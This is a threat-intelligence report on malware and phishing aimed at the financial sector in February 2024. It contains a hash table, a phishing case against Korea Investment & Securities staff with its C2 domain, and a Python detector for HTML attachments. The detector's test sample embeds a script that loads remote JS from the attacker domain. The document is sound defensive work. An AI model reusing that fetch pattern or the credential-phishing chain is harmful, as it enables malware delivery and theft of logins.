Security Issues in the Global Financial Sector – Malware, Phishing, Deep Web & Dark Web cases in February 2024
Statistics of Malware in Distribution Targeting the Financial Sector

Top 10 Major Malware Targeting the Financial Sector
| Attack Stage | Malware Type | MD5 Hash |
|---|---|---|
| Stage 1 | Phishing | f7db2045ef80e8e4c86db829ec0b6ee6 |
| Stage 1 | WebShell | b597418bea2ff4da50540ed191e1bb55 |
| Stage 2 | HackTool | 18cfc7e41afdeb10b15a54e6e39f0463 |
| Stage 2 | HackTool | 110dde62258542a1bcdc15a2af5b54d2 |
| Stage 2 | Dropper | 19c2decfa7271fa30e48d4750c1d18c1 |
| Stage 2 | Dropper | 27ef6917fe32685fdf9b755eb8e97565 |
| Stage 2 | Downloader | 60eddc48df4b79c3b96cd20747d04150 |
| Stage 3 | Infostealer | 88f183304b99c897aacfa321d58e1840 |
| Stage 3 | Infostealer | c8e7b0d3b6afa22e801cacaf16b37355 |
| Stage 3 | Infostealer | 7457dc037c4a5f3713d9243a0dfb1a2c |

Phishing Email Distribution Cases Targeting the Financial Sector
Case 1. Targeting Korea Investment & Securities employees with an email disguised as a fringe benefit announcement

Impersonation target
– Impersonating an HR/payroll specialist, the sender distributed an announcement on fringe benefits

Phishing methodology
– Induces the recipient to download and execute the HTML file in the email body
– The HTML file contained a script that downloads a malicious JS file

Infection aftermath
– Poses as the Microsoft login page to induce login
– Induces the victim to enter account credentials, leading to leakage of login information
– C2 domain: gakgakga[.]online

Figure. Content of the phishing email impersonating a fringe benefit announcement

Figure. Phishing website disguised as the MS login page
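
As a defender-side illustration of the chain described in Case 1 (an HTML attachment whose script downloads a remote JS file), the following added example, which is not part of the original report, triages an HTML attachment for remote script loads and checks the hosts against the C2 domain listed above. The function names, verdict labels and the sample attachment are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# C2 domain as published in the report: defanged in source, refanged only in memory.
IOC_DOMAINS = ["gakgakga[.]online"]
URL_RE = re.compile(r"""https?://[^\s"'<>)\\]+""", re.I)  # URLs inside inline JS

def refang(domain):
    return domain.replace("[.]", ".").lower()

class ScriptCollector(HTMLParser):
    """Collect <script src> values and URLs embedded in inline scripts."""
    def __init__(self):
        super().__init__()
        self.urls, self.in_script = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.urls += [v for k, v in attrs if k == "src" and v]
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.urls += URL_RE.findall(data)

def host_of(url):
    try:  # "//host/x.js" is protocol-relative; a malformed authority raises ValueError
        return (urlparse("https:" + url if url.startswith("//") else url).hostname or "").lower()
    except ValueError:
        return ""

def triage_html_attachment(html):
    """Report remote script hosts in an HTML attachment and any IoC matches."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    hosts = sorted({h for h in map(host_of, parser.urls) if h})
    iocs = [refang(d) for d in IOC_DOMAINS]
    hits = [h for h in hosts if any(h == d or h.endswith("." + d) for d in iocs)]
    verdict = "ioc-match" if hits else "remote-script" if hosts else "no-remote-script"
    return {"remote_script_hosts": hosts, "ioc_hits": hits, "verdict": verdict}

# Constructed sample (not the real attachment): an inline script that pulls remote JS.
SAMPLE_ATTACHMENT = (
    "<html><body><script>var s=document.createElement('script');"
    f"s.src='https://cdn.{refang(IOC_DOMAINS[0])}/constructed.js';"
    "document.head.appendChild(s);</script></body></html>")
```

An `ioc-match` verdict is a signal to block and investigate, while `remote-script` alone only marks the attachment for closer review, since legitimate HTML also loads remote scripts.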